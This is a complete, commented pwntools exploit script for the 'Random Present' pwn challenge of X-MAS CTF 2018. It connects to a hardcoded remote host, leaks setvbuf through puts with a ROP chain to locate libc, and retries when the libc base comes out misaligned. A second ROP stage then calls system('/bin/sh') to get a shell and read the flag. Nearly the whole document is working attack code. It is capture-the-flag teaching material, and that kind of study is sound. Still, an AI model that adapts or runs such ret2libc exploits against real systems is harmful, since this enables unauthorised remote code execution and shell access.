Random Present - PWN Challenge | X-MAS CTF 2018
from pwn import *
# 64-bit Linux target: pwntools helpers such as flat()/u64() pack and unpack
# according to context.arch/os, so this must be set before building payloads.
context.update(os='linux', arch='amd64')
# context.log_level = 'DEBUG'          # uncomment to dump every byte on the tube
# Only matters if a debugger is attached: open it in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# Challenge binary (GOT/symbol lookups) and the libc build believed to match
# the remote target (presumably identified from an earlier leak). The
# commented alternatives switch to the local libc and a local process for
# offline testing.
elf = ELF('./chall')
libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process(elf.path)
def screen_clean():
    """Erase the previous terminal line (cursor up one line, clear to end of line).

    Called between reconnect attempts to wipe the previous status line so
    repeated retries do not flood the screen. Emits raw ANSI escapes; on a
    terminal that does not understand them the bytes show up as garbage.
    """
    # ESC[F = move to the start of the previous line, ESC[K = clear to end of line.
    sys.stdout.write("\033[F\033[K")
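HOST, PORT = '199.247.6.180', 10005

# ROP building blocks. The 0x40xxxx addresses are absolute, which only holds
# for a non-PIE binary; re-derive them (ROPgadget/objdump) if the target changes.
POP_RDI_RET = 0x000000000040077b   # pop rdi ; ret
MAIN_ADDR = 0x0000000000400676     # main(): returning here buys a second ROP round
PADDING = 'A' * 40                 # filler up to the saved return address (layout from the binary, not shown here)
MAX_RETRIES = 20                   # bound the reconnect loop instead of spinning forever

# Offset of setvbuf inside the *local* libc copy. Captured once, up front:
# assigning libc.address below rebases every entry in libc.sym, so reading
# it later would no longer give the offset.
setvbuf_offset = libc.sym['setvbuf']


def _rop(*chain):
    """Return PADDING followed by the 64-bit packed words of *chain*."""
    return flat(PADDING, *chain)


def leak_setvbuf(p):
    """Stage 1: call puts(GOT[setvbuf]) and return into main for stage 2.

    p: live pwntools tube to the challenge.
    Returns the leaked runtime address of setvbuf as an int.

    puts() stops at the first NUL byte, so a canonical 6-byte user-space
    address comes back short and is NUL-padded to 8 bytes. A leak whose bytes
    happen to contain 0x0a is truncated by recvline(); the page-alignment
    check in the caller catches that case too and triggers a retry.
    """
    stage1 = _rop(POP_RDI_RET, elf.got['setvbuf'], elf.sym['puts'], MAIN_ADDR)
    p.sendlineafter('ROP me!\n', stage1)
    raw = p.recvline(keepends=False)
    leaked = u64(raw.ljust(8, '\x00'))
    log.success('Setvbuf leaked address: ' + hex(leaked))
    return leaked


p = remote(HOST, PORT)

# A libc base is page aligned (low 12 bits zero). A misaligned result means
# the remote setvbuf is not at our local libc's offset, i.e. the remote libc
# build does not match the local copy. Retrying assumes a fresh connection may
# be served by a different build; if the remote libc is simply different, only
# a new local copy will help, hence the retry cap. Caveat: a wrong libc whose
# setvbuf offset differs by a multiple of 0x1000 would slip through this check.
for attempt in range(MAX_RETRIES + 1):
    if attempt:
        log.info('Wrong GLIBC detected. Retrying...')
        p.close()
        screen_clean()
        sleep(1)           # small back-off between reconnects
        p = remote(HOST, PORT)
        screen_clean()
    libc.address = leak_setvbuf(p) - setvbuf_offset
    if (libc.address & 0xfff) == 0:
        break
else:
    p.close()
    log.failure('No page-aligned libc base after %d retries; the local libc '
                'probably does not match the remote one' % MAX_RETRIES)
    raise SystemExit(1)

log.success('GLIBC address: ' + hex(libc.address))
system_addr = libc.sym['system']            # rebased: libc.address is set now
binsh_addr = next(libc.search('/bin/sh'))   # first "/bin/sh" string in libc, rebased
log.success('System address: ' + hex(system_addr))
log.success('String /bin/sh address: ' + hex(binsh_addr))
log.info('Getting shell...')

# Stage 2: system("/bin/sh"), then exit() so the process leaves cleanly once
# the shell returns instead of crashing on a garbage return address.
stage2 = _rop(POP_RDI_RET, binsh_addr, system_addr, libc.sym['exit'])
p.sendlineafter('ROP me!\n', stage2)
p.sendline('cat flag')
log.success('Flag: ' + p.recvline())
p.close()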